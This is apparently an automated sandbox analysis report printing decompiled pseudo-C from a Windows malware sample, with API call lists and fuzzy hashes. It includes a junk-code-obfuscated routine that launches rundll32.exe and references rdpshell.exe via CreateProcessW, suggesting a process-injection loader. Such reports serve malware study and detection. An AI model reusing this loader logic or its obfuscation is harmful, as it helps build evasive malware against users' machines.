                                                • Sleep.KERNEL32(0000000A,00000000,?,?,?,0040384C), ref: 004030BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Sleep
                                                • String ID: x+P$x+P
                                                • API String ID: 3472027048-2134562320
                                                • Opcode ID: 2c17174c168b62260ae6c5743225d74d5a734f81eab71e83ac5db3cb1aef7a2b
                                                • Instruction ID: 3d46a3be0707701196176bf7578f381eb66bec52de30d6d801ec7e3521836ef9
                                                • Opcode Fuzzy Hash: 2c17174c168b62260ae6c5743225d74d5a734f81eab71e83ac5db3cb1aef7a2b
                                                • Instruction Fuzzy Hash: C3C164726013508BC715CF29E98832BBFE4BB99311F0882BFD444AB3D5C7B89A49D794
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E00403330(void* __eax, signed int __edi, void* __ebp) {
                                                				struct _MEMORY_BASIC_INFORMATION _v44;
                                                				void* _v48;
                                                				signed int __ebx;
                                                				void* _t58;
                                                				signed int _t61;
                                                				int _t65;
                                                				signed int _t67;
                                                				void _t70;
                                                				int _t71;
                                                				signed int _t78;
                                                				void* _t79;
                                                				signed int _t81;
                                                				intOrPtr _t82;
                                                				signed int _t87;
                                                				signed int _t88;
                                                				signed int _t89;
                                                				signed int _t92;
                                                				void* _t96;
                                                				signed int _t99;
                                                				void* _t103;
                                                				intOrPtr _t104;
                                                				void* _t106;
                                                				void* _t108;
                                                				signed int _t113;
                                                				void* _t115;
                                                				void* _t116;
                                                
                                                				_t56 = __eax;
                                                				_t89 =  *(__eax - 4);
                                                				_t78 =  *0x500055; // 0x0
                                                				if((_t89 & 0x00000007) != 0) {
                                                					__eflags = _t89 & 0x00000005;
                                                					if((_t89 & 0x00000005) != 0) {
                                                						_pop(_t78);
                                                						__eflags = _t89 & 0x00000003;
                                                						if((_t89 & 0x00000003) == 0) {
                                                							_push(_t78);
                                                							_push(__edi);
                                                							_t116 = _t115 + 0xffffffdc;
                                                							_t103 = __eax - 0x10;
                                                							E00402D0C();
                                                							_t58 = _t103;
                                                							 *_t116 =  *_t58;
                                                							_v48 =  *((intOrPtr*)(_t58 + 4));
                                                							_t92 =  *(_t58 + 0xc);
                                                							if((_t92 & 0x00000008) != 0) {
                                                								_t79 = _t103;
                                                								_t113 = _t92 & 0xfffffff0;
                                                								_t99 = 0;
                                                								__eflags = 0;
                                                								while(1) {
                                                									VirtualQuery(_t79,  &_v44, 0x1c);
                                                									_t61 = VirtualFree(_t79, 0, 0x8000);
                                                									__eflags = _t61;
                                                									if(_t61 == 0) {
                                                										_t99 = _t99 | 0xffffffff;
                                                										goto L10;
                                                									}
                                                									_t104 = _v44.RegionSize;
                                                									__eflags = _t113 - _t104;
                                                									if(_t113 > _t104) {
                                                										_t113 = _t113 - _t104;
                                                										_t79 = _t79 + _t104;
                                                										continue;
                                                									}
                                                									goto L10;
                                                								}
                                                							} else {
                                                								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
                                                								if(_t65 == 0) {
                                                									_t99 = __edi | 0xffffffff;
                                                								} else {
                                                									_t99 = 0;
                                                								}
                                                							}
                                                							L10:
                                                							if(_t99 == 0) {
                                                								 *_v48 =  *_t116;
                                                								 *( *_t116 + 4) = _v48;
                                                							}
                                                							 *0x502b74 = 0;
                                                							return _t99;
                                                						} else {
                                                							return 0xffffffff;
                                                						}
                                                					} else {
                                                						goto L31;
                                                					}
                                                				} else {
                                                					__eflags = __bl;
                                                					__ebx =  *__edx;
                                                					if(__eflags != 0) {
                                                						while(1) {
                                                							__eax = 0x100;
                                                							asm("lock cmpxchg [ebx], ah");
                                                							if(__eflags == 0) {
                                                								goto L14;
                                                							}
                                                							asm("pause");
                                                							__eflags =  *0x500985;
                                                							if(__eflags != 0) {
                                                								continue;
                                                							} else {
                                                								Sleep(0);
                                                								__edx = __edx;
                                                								__ecx = __ecx;
                                                								__eax = 0x100;
                                                								asm("lock cmpxchg [ebx], ah");
                                                								if(__eflags != 0) {
                                                									Sleep(0xa);
                                                									__edx = __edx;
                                                									__ecx = __ecx;
                                                									continue;
                                                								}
                                                							}
                                                							goto L14;
                                                						}
                                                					}
                                                					L14:
                                                					_t14 = __edx + 0x14;
                                                					 *_t14 =  *(__edx + 0x14) - 1;
                                                					__eflags =  *_t14;
                                                					__eax =  *(__edx + 0x10);
                                                					if( *_t14 == 0) {
                                                						__eflags = __eax;
                                                						if(__eax == 0) {
                                                							L20:
                                                							 *(__ebx + 0x14) = __eax;
                                                						} else {
                                                							__eax =  *(__edx + 0xc);
                                                							__ecx =  *(__edx + 8);
                                                							 *(__eax + 8) = __ecx;
                                                							 *(__ecx + 0xc) = __eax;
                                                							__eax = 0;
                                                							__eflags =  *((intOrPtr*)(__ebx + 0x18)) - __edx;
                                                							if( *((intOrPtr*)(__ebx + 0x18)) == __edx) {
                                                								goto L20;
                                                							}
                                                						}
                                                						 *__ebx = __al;
                                                						__eax = __edx;
                                                						__edx =  *(__edx - 4);
                                                						__bl =  *0x500055; // 0x0
                                                						L31:
                                                						__eflags = _t78;
                                                						_t81 = _t89 & 0xfffffff0;
                                                						_push(_t101);
                                                						_t106 = _t56;
                                                						if(__eflags != 0) {
                                                							while(1) {
                                                								_t67 = 0x100;
                                                								asm("lock cmpxchg [0x500ae4], ah");
                                                								if(__eflags == 0) {
                                                									goto L32;
                                                								}
                                                								asm("pause");
                                                								__eflags =  *0x500985;
                                                								if(__eflags != 0) {
                                                									continue;
                                                								} else {
                                                									Sleep(0);
                                                									_t67 = 0x100;
                                                									asm("lock cmpxchg [0x500ae4], ah");
                                                									if(__eflags != 0) {
                                                										Sleep(0xa);
                                                										continue;
                                                									}
                                                								}
                                                								goto L32;
                                                							}
                                                						}
                                                						L32:
                                                						__eflags = (_t106 - 4)[_t81] & 0x00000001;
                                                						_t87 = (_t106 - 4)[_t81];
                                                						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
                                                							_t67 = _t81 + _t106;
                                                							_t88 = _t87 & 0xfffffff0;
                                                							_t81 = _t81 + _t88;
                                                							__eflags = _t88 - 0xb30;
                                                							if(_t88 >= 0xb30) {
                                                								_t67 = E00402B84(_t67);
                                                							}
                                                						} else {
                                                							_t88 = _t87 | 0x00000008;
                                                							__eflags = _t88;
                                                							(_t106 - 4)[_t81] = _t88;
                                                						}
                                                						__eflags =  *(_t106 - 4) & 0x00000008;
                                                						if(( *(_t106 - 4) & 0x00000008) != 0) {
                                                							_t88 =  *(_t106 - 8);
                                                							_t106 = _t106 - _t88;
                                                							_t81 = _t81 + _t88;
                                                							__eflags = _t88 - 0xb30;
                                                							if(_t88 >= 0xb30) {
                                                								_t67 = E00402B84(_t106);
                                                							}
                                                						}
                                                						__eflags = _t81 - 0x13ffe0;
                                                						if(_t81 == 0x13ffe0) {
                                                							__eflags =  *0x500aec - 0x13ffe0;
                                                							if( *0x500aec != 0x13ffe0) {
                                                								_t82 = _t106 + 0x13ffe0;
                                                								E00402C24(_t67);
                                                								 *((intOrPtr*)(_t82 - 4)) = 2;
                                                								 *0x500aec = 0x13ffe0;
                                                								 *0x500ae8 = _t82;
                                                								 *0x500ae4 = 0;
                                                								__eflags = 0;
                                                								return 0;
                                                							} else {
                                                								_t108 = _t106 - 0x10;
                                                								_t70 =  *_t108;
                                                								_t96 =  *(_t108 + 4);
                                                								 *(_t70 + 4) = _t96;
                                                								 *_t96 = _t70;
                                                								 *0x500ae4 = 0;
                                                								_t71 = VirtualFree(_t108, 0, 0x8000);
                                                								__eflags = _t71 - 1;
                                                								asm("sbb eax, eax");
                                                								return _t71;
                                                							}
                                                						} else {
                                                							 *(_t106 - 4) = _t81 + 3;
                                                							 *(_t106 - 8 + _t81) = _t81;
                                                							E00402BC4(_t106, _t88, _t81);
                                                							 *0x500ae4 = 0;
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                					} else {
                                                						__eflags = __eax;
                                                						 *(__edx + 0x10) = __ecx;
                                                						 *(__ecx - 4) = __eax;
                                                						if(__eflags == 0) {
                                                							__ecx =  *(__ebx + 8);
                                                							 *(__edx + 0xc) = __ebx;
                                                							 *(__edx + 8) = __ecx;
                                                							 *(__ecx + 0xc) = __edx;
                                                							 *(__ebx + 8) = __edx;
                                                							 *__ebx = 0;
                                                							__eax = 0;
                                                							__eflags = 0;
                                                							_pop(__ebx);
                                                							return 0;
                                                						} else {
                                                							__eax = 0;
                                                							__eflags = 0;
                                                							 *__ebx = __al;
                                                							_pop(__ebx);
                                                							return 0;
                                                						}
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • Sleep.KERNEL32(00000000,?,?,00000000,00402FA2), ref: 004033C6
                                                • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,00402FA2), ref: 004033E0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: Sleep
                                                • String ID:
                                                • API String ID: 3472027048-0
                                                • Opcode ID: 54fd6bdb01a5683e4c256ea1a44718bb24c06b3cbbe914b29bdd126fc742ad81
                                                • Instruction ID: 594f2e475e2ef9a1e4c6aa4b7454f7a07816349c63cc202afb12dfd344af9c94
                                                • Opcode Fuzzy Hash: 54fd6bdb01a5683e4c256ea1a44718bb24c06b3cbbe914b29bdd126fc742ad81
                                                • Instruction Fuzzy Hash: FA7113716043408FD716CF29CE88B1BBBD8AB95315F14827FE848AB3D2D6B8C945C759
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 80%
                                                			E004F4848(char __eax, void* __ebx, intOrPtr __ecx, struct _SECURITY_ATTRIBUTES* __edx, void* __edi, void* __esi, void* __fp0) {
                                                				char _v8;
                                                				struct _SECURITY_ATTRIBUTES* _v12;
                                                				intOrPtr _v16;
                                                				char _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				void* _v52;
                                                				short _v72;
                                                				intOrPtr _v76;
                                                				intOrPtr _v112;
                                                				char _v120;
                                                				intOrPtr _v124;
                                                				char _v128;
                                                				char _v132;
                                                				signed int _v136;
                                                				int _v140;
                                                				signed int _t171;
                                                				signed int _t172;
                                                				signed int _t173;
                                                				signed int _t174;
                                                				signed int _t177;
                                                				signed int _t180;
                                                				signed int _t181;
                                                				signed int _t184;
                                                				signed int _t186;
                                                				signed int _t188;
                                                				signed int _t193;
                                                				signed int _t194;
                                                				signed int _t196;
                                                				signed int _t198;
                                                				signed int _t220;
                                                				signed int _t228;
                                                				signed int _t231;
                                                				intOrPtr _t235;
                                                				signed int _t238;
                                                				signed int _t240;
                                                				signed int _t241;
                                                				signed int _t244;
                                                				signed int _t246;
                                                				signed int _t247;
                                                				signed int _t248;
                                                				signed int _t250;
                                                				signed int _t252;
                                                				signed int _t254;
                                                				int _t263;
                                                				signed int _t269;
                                                				signed int _t271;
                                                				signed int _t274;
                                                				signed int _t292;
                                                				signed int _t295;
                                                				signed int _t301;
                                                				signed int _t302;
                                                				signed int _t314;
                                                				intOrPtr _t317;
                                                				signed int _t321;
                                                				intOrPtr _t323;
                                                				intOrPtr _t325;
                                                				intOrPtr _t332;
                                                				signed int _t334;
                                                				intOrPtr _t346;
                                                				signed int _t348;
                                                				signed int _t349;
                                                				signed int _t352;
                                                				signed int _t353;
                                                				signed int _t354;
                                                				signed int _t357;
                                                				signed int _t359;
                                                				signed int _t360;
                                                				signed int _t367;
                                                				intOrPtr _t369;
                                                				signed int _t378;
                                                				intOrPtr _t409;
                                                				intOrPtr _t410;
                                                				signed int _t419;
                                                				void* _t424;
                                                				void* _t425;
                                                				intOrPtr _t426;
                                                				void* _t427;
                                                				void* _t430;
                                                				void* _t435;
                                                				signed int _t443;
                                                				void* _t447;
                                                
                                                				_t422 = __esi;
                                                				_t421 = __edi;
                                                				_t424 = _t425;
                                                				_t426 = _t425 + 0xffffff78;
                                                				_push(__ebx);
                                                				_push(__esi);
                                                				_push(__edi);
                                                				_v136 = 0;
                                                				_v140 = 0;
                                                				_v132 = 0;
                                                				_v128 = 0;
                                                				_v20 = 0;
                                                				_v52 = 0;
                                                				_v16 = __ecx;
                                                				_v12 = __edx;
                                                				_v8 = __eax;
                                                				E00406AAC( &_v8);
                                                				E00406AAC( &_v12);
                                                				_push(_t424);
                                                				_push(0x4f4f77);
                                                				_push( *[fs:eax]);
                                                				 *[fs:eax] = _t426;
                                                				_t171 =  *0x4fef3c; // 0x1cb932a9
                                                				E004FEF38 = _t171;
                                                				_t172 =  *0x4fef28; // 0x3c79b5d4
                                                				 *0x4fef3c = _t172;
                                                				_t173 = E004FEF38; // 0xc3c34fdc
                                                				_t427 = _t173 -  *0x4fef3c; // 0x1cb932a9
                                                				if(_t427 >= 0) {
                                                					_t174 =  *0x4feecc; // 0xd26bafe0
                                                					__eflags = _t174 + E004FEF34 - E004FEF34; // 0xc3c34ef0
                                                					if(__eflags == 0) {
                                                						asm("fild dword [0x4feedc]");
                                                						E004FEF50 = E004048D8();
                                                					}
                                                					L6:
                                                					 *0x4feeec =  *0x4fef3c * 0x9b;
                                                					_t177 =  *0x4feef0; // 0x44632301
                                                					 *0x4feef0 = E0040489C(_t177);
                                                					asm("fild dword [0x4fef38]");
                                                					 *0x4fef04 = E004048D8();
                                                					_t180 = E004FEF20; // 0x6e687a1a
                                                					E004FEF0C = _t180;
                                                					_t181 =  *0x4fef4c; // 0x43c1493c
                                                					E004FEF20 = _t181 +  *0x4feeec;
                                                					_push(_t424);
                                                					_push(0x4f4f22);
                                                					_push( *[fs:eax]);
                                                					 *[fs:eax] = _t426;
                                                					_t184 =  *0x4feea0; // 0xa1d900
                                                					 *0x4feea0 = E0040489C(_t184);
                                                					_t186 =  *0x4feea0; // 0xa1d900
                                                					 *0x4feea0 = E0040489C(_t186);
                                                					_t188 =  *0x4feea0; // 0xa1d900
                                                					_t430 = _t188 -  *0x4feea0; // 0xa1d900
                                                					if(_t430 > 0) {
                                                						_push(_v36);
                                                						_t419 =  *0x4feecc; // 0xd26bafe0
                                                						_t367 =  *0x4fef30; // 0xa1d816
                                                						 *0x4fef04 = E004EE798(_t367, 0, _v28, _t419, _t430);
                                                						_t369 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4feee8 = E0040489C(_t369);
                                                					}
                                                					_v32 = _v24 + 4;
                                                					if(0xca -  *0x4fef3c >= 0xd9) {
                                                						_t193 =  *0x4fef3c * 0x58;
                                                						__eflags = _t193;
                                                						 *0x4fef30 = _t193;
                                                					} else {
                                                						_v36 = _v40 - _v28;
                                                					}
                                                					_t194 =  *0x4fef04; // 0x43c14963
                                                					E004FEF50 = _t194 *  *0x4feef0;
                                                					_t196 = E004FEF20; // 0x6e687a1a
                                                					 *0x4feed8 = _t196 + 0x87;
                                                					_t198 =  *0x4fef04; // 0x43c14963
                                                					 *0x4feedc = _t198;
                                                					E004F4258( &_v128, 0, _t421, _t422); // executed
                                                					E0040713C( &_v52, L"system32\\rundll32.exe", _v128);
                                                					E00407400( &_v132, _v52);
                                                					if(E00414964(_v132, 1) != 0) {
                                                						L25:
                                                						_v32 = (_v44 << 3) + (_v44 << 3) * 8;
                                                						_v36 = _v28 - 0x9c;
                                                						E00406CF4( &_v20, _v20);
                                                						asm("fild dword [0x4feecc]");
                                                						 *0x4fef28 = E004048CC();
                                                						 *0x4fef40 = E004F3F2C(0x4feef0,  &_v40, 0x4feeec, _t443, 0x4feef4,  &_v48,  &_v36,  &_v28);
                                                						_t220 =  *0x4feeec; // 0xb52124f2
                                                						 *0x4feeec = E0040489C(_t220);
                                                						E004049A8( &_v120, 0x44);
                                                						_v40 = _v24 * _v36;
                                                						_v44 = _v28 * _v32;
                                                						_t228 = E004FEF38; // 0xc3c34fdc
                                                						 *0x4fef3c = _t228;
                                                						E004FEF50 =  *0x4fef48 * 0xb1;
                                                						 *0x4feedc =  *0x4fef44 * 0x16;
                                                						_t231 =  *0x4feea0; // 0xa1d900
                                                						 *0x4feef4 = _t231 -  *0x4feef0;
                                                						_v120 = 0x44;
                                                						_v112 = 0;
                                                						_v76 = 1;
                                                						_v44 = 0;
                                                						if(_v44 >= 4) {
                                                							L29:
                                                							_t235 =  *0x4fef40; // 0x3c79b5d4
                                                							_v124 = _t235 + 4;
                                                							asm("fild dword [ebp-0x78]");
                                                							 *0x4fef3c = E004048D8();
                                                							_t238 =  *0x4feea0; // 0xa1d900
                                                							E004FEF50 = _t238 -  *0x4feefc;
                                                							_t240 =  *0x4feedc; // 0xbc3e19a
                                                							 *0x4feed8 = _t240;
                                                							_t241 =  *0x4feef0; // 0x44632301
                                                							_v124 = _t241 + 0x33;
                                                							asm("fild dword [ebp-0x78]");
                                                							 *0x4feef0 = E004048CC();
                                                							_t244 = E004FEF0C; // 0xb52124bf
                                                							 *0x4fef04 = _t244 * E004FEF10;
                                                							_v72 = 0;
                                                							_t246 =  *0x4fef18; // 0xbc3e19a
                                                							E004FEF38 = _t246;
                                                							_t247 =  *0x4fef18; // 0xbc3e19a
                                                							E004FEF38 = _t247;
                                                							_t248 = E004FEF38; // 0xc3c34fdc
                                                							_t447 = _t248 - E004FEF38; // 0xc3c34fdc
                                                							if(_t447 >= 0) {
                                                								L34:
                                                								asm("fild dword [0x4feef4]");
                                                								 *0x4fef18 = E004048CC();
                                                								_t250 = E004FEF0C; // 0xb52124bf
                                                								E004FEF34 = _t250 + E004FEF10;
                                                								_t252 =  *0x4feeec; // 0xb52124f2
                                                								 *0x4fef4c = _t252 + 0x55;
                                                								_t254 =  *0x4fef04; // 0x43c14963
                                                								 *0x4feed8 = _t254 + 0x53;
                                                								_push(_v16);
                                                								_push( &_v120);
                                                								_push(0);
                                                								_push(0);
                                                								_push(0x20);
                                                								E004F37A4(_v8, 0,  &_v140, _t421, _t422); // executed
                                                								E004071B8();
                                                								_t263 = CreateProcessW(0, E004070B4(_v136), _v12, E004F5034, _v140, E004F502C, _v52, 0, 0, 0); // executed
                                                								if(_t263 != 0) {
                                                									_v36 = _v48 * 0xdf;
                                                									_v28 = _v32 * 0x9d;
                                                									_t292 =  *0x4feecc; // 0xd26bafe0
                                                									_v124 = _t292 + 4;
                                                									asm("fild dword [ebp-0x78]");
                                                									 *0x4fef40 = E004048D8();
                                                									 *0x4feea0 =  *0x4feea0 + 0xa6;
                                                									_t295 =  *0x4feea0; // 0xa1d900
                                                									 *0x4feee8 = _t295 + _t295 + (_t295 + _t295) * 4;
                                                									 *0x4fef44 = E004F0EBC( &_v40,  &E004FEF38, _t295 + _t295);
                                                								}
                                                								_v40 = _v48 + _v28;
                                                								_v124 = _v44 + 0x67;
                                                								asm("fild dword [ebp-0x78]");
                                                								_v36 = E004048CC();
                                                								_t269 = E004FEED0; // 0xc3c34ef0
                                                								 *0x4fef4c = _t269 - 0x36;
                                                								_t271 =  *0x4fef48; // 0xc3c34ef0
                                                								 *0x4fef4c = _t271;
                                                								E004FEED0 = 0x35 -  *0x4feeec;
                                                								_t274 = E004FEF00; // 0xa3b3f6c0
                                                								 *0x4feeec = _t274 + 0x33;
                                                								_pop(_t409);
                                                								 *[fs:eax] = _t409;
                                                								_pop(_t410);
                                                								 *[fs:eax] = _t410;
                                                								_push(E004F4F7E);
                                                								E00406A68( &_v140, 2);
                                                								E004069A8( &_v132);
                                                								E004069F0( &_v128);
                                                								E004069F0( &_v52);
                                                								E004069A8( &_v20);
                                                								return E00406A68( &_v12, 2);
                                                							}
                                                							_v48 = 0;
                                                							if(_v48 >= 1) {
                                                								L32:
                                                								_t301 =  *0x4fef44; // 0x38993
                                                								 *0x4feed8 = _t301;
                                                								_t302 =  *0x4feed8; // 0x1cb9338e
                                                								if(_t302 -  *0x4feea0 < 0xcb) {
                                                									_v28 = _v24 + 0xbb;
                                                								}
                                                								goto L34;
                                                							} else {
                                                								goto L31;
                                                							}
                                                							do {
                                                								L31:
                                                								_v48 = _v48 + 1;
                                                								E00406CF4( &_v20, _v20);
                                                							} while (_v48 < 1);
                                                							goto L32;
                                                						}
                                                						_v44 = _v44 + 1;
                                                						_v48 = 0;
                                                						do {
                                                							E00407678(_v20, 0, 1,  &_v20);
                                                							_v48 = _v48 + 1;
                                                						} while (_v48 != 0xb);
                                                						_v24 = _v40 + 0x72;
                                                						_t314 =  *0x4feeec; // 0xb52124f2
                                                						_v124 = _t314 + 4;
                                                						asm("fild dword [ebp-0x78]");
                                                						 *0x4feefc = E004048D8();
                                                						_t317 =  *0x4feee8; // 0xdcd0f434
                                                						 *0x4fef18 = _t317 + 7;
                                                						goto L29;
                                                					} else {
                                                						if(_v44 <= _v28) {
                                                							L17:
                                                							_v36 = 0;
                                                							do {
                                                								_t321 = E004FEED0; // 0xc3c34ef0
                                                								 *0x4fef30 = _t321 + E004FEED0;
                                                								_t323 =  *0x4feee8; // 0xdcd0f434
                                                								 *0x4fef40 = _t323 - E004FEF38;
                                                								_t325 =  *0x4feee0; // 0x747938b
                                                								_v124 = _t325 + 0xda;
                                                								asm("fild dword [ebp-0x78]");
                                                								 *0x4feecc = E004048CC();
                                                								_v36 = _v36 + 1;
                                                							} while (_v36 != 5);
                                                							 *0x4feeec =  *0x4feea0 * 0xa4;
                                                							E00407678(_v20, 0, 1,  &_v20);
                                                							_t332 =  *0x4feefc; // 0x4b08dcc7
                                                							 *0x4feefc = E0040489C(_t332);
                                                							_t334 =  *0x4fef28; // 0x3c79b5d4
                                                							E004FEF10 = _t334 + 4;
                                                							E00406D48( &_v52, L"C:\\Windows\\System32\\rundll32.exe");
                                                							_v48 = 0;
                                                							do {
                                                								E00407640(_v20, _v20);
                                                								if(0 == 0) {
                                                									_t354 = E004FEED0; // 0xc3c34ef0
                                                									E004FEED0 = E0040489C(_t354);
                                                								}
                                                								_v28 = _v24 + 0x57;
                                                								_v48 = _v48 + 1;
                                                							} while (_v48 != 7);
                                                							_v32 = _v44 + _v44 * 4 + (_v44 + _v44 * 4) * 4;
                                                							_t346 =  *0x4feee0; // 0x747938b
                                                							 *0x4fef14 = _t346 -  *0x4fef44;
                                                							_t348 =  *0x4feef4; // 0xb52124ca
                                                							E004FEF2C = _t348;
                                                							_t349 =  *0x4feea0; // 0xa1d900
                                                							E004FEF34 = _t349;
                                                							if(_v44 - _v40 < 0x9d) {
                                                								_t352 =  *0x4fef3c; // 0x1cb932a9
                                                								_t353 = _t352 - E004FEF2C;
                                                								_t443 = _t353;
                                                								 *0x4fef4c = _t353;
                                                							}
                                                							goto L25;
                                                						}
                                                						_v44 = 0;
                                                						if(_v44 >= 0xa) {
                                                							goto L17;
                                                						} else {
                                                							goto L14;
                                                						}
                                                						do {
                                                							L14:
                                                							_v44 = _v44 + 1;
                                                							_t357 = E004FEF50; // 0xa3b3f6c0
                                                							E004FEF50 = E0040489C(_t357);
                                                							_t359 =  *0x4fef28; // 0x3c79b5d4
                                                							 *0x4feecc = _t359;
                                                							_t360 =  *0x4feecc; // 0xd26bafe0
                                                							_t435 = _t360 - E004FEF50; // 0xa3b3f6c0
                                                							if(_t435 > 0) {
                                                								_v124 = _v40 + 4;
                                                								asm("fild dword [ebp-0x78]");
                                                								_v28 = E004048D8();
                                                							}
                                                						} while (_v44 < 0xa);
                                                						goto L17;
                                                					}
                                                				}
                                                				_v48 = 0;
                                                				if(_v48 >= 4) {
                                                					L3:
                                                					_v124 = _v44 + 0x46;
                                                					asm("fild dword [ebp-0x78]");
                                                					_v36 = E004048CC();
                                                					E00406CF4( &_v20, L"rdpshell.exe");
                                                					_t378 =  *0x4fef28; // 0x3c79b5d4
                                                					 *0x4fef28 = E0040489C(_t378);
                                                					goto L6;
                                                				} else {
                                                					goto L2;
                                                				}
                                                				do {
                                                					L2:
                                                					_v48 = _v48 + 1;
                                                					_v124 = _v40 + 2;
                                                					asm("fild dword [ebp-0x78]");
                                                					_v28 = E004048CC();
                                                				} while (_v48 < 4);
                                                				goto L3;
                                                			}

                                                0x004f4f76
                                                0x004f4d92
                                                0x004f4d99
                                                0x004f4daf
                                                0x004f4daf
                                                0x004f4db4
                                                0x004f4db9
                                                0x004f4dc9
                                                0x004f4dd3
                                                0x004f4dd3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f4d9b
                                                0x004f4d9b
                                                0x004f4d9b
                                                0x004f4da4
                                                0x004f4da9
                                                0x00000000
                                                0x004f4d9b
                                                0x004f4cb5
                                                0x004f4cba
                                                0x004f4cbd
                                                0x004f4ccb
                                                0x004f4cd0
                                                0x004f4cd3
                                                0x004f4cdf
                                                0x004f4ce2
                                                0x004f4cea
                                                0x004f4ced
                                                0x004f4cf5
                                                0x004f4cfa
                                                0x004f4d02
                                                0x00000000
                                                0x004f4a6f
                                                0x004f4a75
                                                0x004f4ac5
                                                0x004f4ac7
                                                0x004f4aca
                                                0x004f4aca
                                                0x004f4ad5
                                                0x004f4ada
                                                0x004f4ae5
                                                0x004f4aea
                                                0x004f4af4
                                                0x004f4af7
                                                0x004f4aff
                                                0x004f4b04
                                                0x004f4b07
                                                0x004f4b17
                                                0x004f4b2a
                                                0x004f4b2f
                                                0x004f4b39
                                                0x004f4b3e
                                                0x004f4b46
                                                0x004f4b53
                                                0x004f4b5a
                                                0x004f4b5d
                                                0x004f4b63
                                                0x004f4b68
                                                0x004f4b6a
                                                0x004f4b74
                                                0x004f4b74
                                                0x004f4b7f
                                                0x004f4b82
                                                0x004f4b85
                                                0x004f4b94
                                                0x004f4b97
                                                0x004f4ba2
                                                0x004f4ba7
                                                0x004f4bac
                                                0x004f4bb1
                                                0x004f4bb6
                                                0x004f4bc6
                                                0x004f4bc8
                                                0x004f4bcd
                                                0x004f4bcd
                                                0x004f4bd3
                                                0x004f4bd3
                                                0x00000000
                                                0x004f4bc6
                                                0x004f4a79
                                                0x004f4a80
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f4a82
                                                0x004f4a82
                                                0x004f4a82
                                                0x004f4a85
                                                0x004f4a8f
                                                0x004f4a94
                                                0x004f4a99
                                                0x004f4a9e
                                                0x004f4aa3
                                                0x004f4aa9
                                                0x004f4ab1
                                                0x004f4ab4
                                                0x004f4abc
                                                0x004f4abc
                                                0x004f4abf
                                                0x00000000
                                                0x004f4a82
                                                0x004f4a69
                                                0x004f48b8
                                                0x004f48bf
                                                0x004f48de
                                                0x004f48e4
                                                0x004f48e7
                                                0x004f48ef
                                                0x004f48fa
                                                0x004f48ff
                                                0x004f4909
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004f48c1
                                                0x004f48c1
                                                0x004f48c1
                                                0x004f48ca
                                                0x004f48cd
                                                0x004f48d5
                                                0x004f48d8
                                                0x00000000

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.316063711.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.316179463.0000000000505000.00000040.00020000.sdmp
                                                • Associated: 00000000.00000002.316184805.000000000050A000.00000040.00020000.sdmp
                                                Similarity
                                                • API ID: AllocString
                                                • String ID: 4O$C:\Windows\System32\rundll32.exe$D$rdpshell.exe$system32\rundll32.exe
                                                • API String ID: 2525500382-1342866739
                                                • Opcode ID: 294ea8d43e65ee35cdbb1fe8553bf5039f8e85ed76c2f81e4b3d05ace0147caa
                                                • Instruction ID: 208ef5cfb6722b5f841e2911356f7f4d9db35c8e95b638ab5fbca3f605b59975
                                                • Opcode Fuzzy Hash: 294ea8d43e65ee35cdbb1fe8553bf5039f8e85ed76c2f81e4b3d05ace0147caa
                                                • Instruction Fuzzy Hash: 8922D8719102499FDB10DFAAE881AAEBBF5FB48305F14843AE104E7271D775A960CF2D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004F37A4(unsigned int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                				unsigned int _v8;
                                                				void* _v12;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				long _v64;
                                                				char _v68;
                                                				unsigned int _v72;
                                                				unsigned int _v76;
                                                				unsigned int _v80;
                                                				signed int _v84;
                                                				unsigned int _v88;
                                                				signed int _t150;
                                                				signed int _t151;
                                                				signed int _t153;
                                                				signed int _t154;
                                                				signed int _t156;
                                                				intOrPtr _t157;
                                                				signed int _t167;
                                                				signed int _t170;
                                                				signed int _t178;
                                                				signed int _t180;
                                                				signed int _t183;
                                                				signed int _t184;
                                                				WCHAR* _t193;
                                                				long _t196;
                                                				signed int _t200;
                                                				signed int _t201;
                                                				signed int _t202;
                                                				signed int _t204;
                                                				signed int _t208;
                                                				signed int _t217;
                                                				signed int _t223;
                                                				signed int _t228;
                                                				signed int _t231;
                                                				signed int _t236;
                                                				signed int _t237;
                                                				signed int _t238;
                                                				intOrPtr _t240;
                                                				signed int _t245;
                                                				signed int _t246;
                                                				WCHAR* _t253;
                                                				signed int _t257;
                                                				signed int _t258;
                                                				signed int _t260;
                                                				signed int _t261;
                                                				signed int _t274;
                                                				signed int _t276;
                                                				signed int _t278;
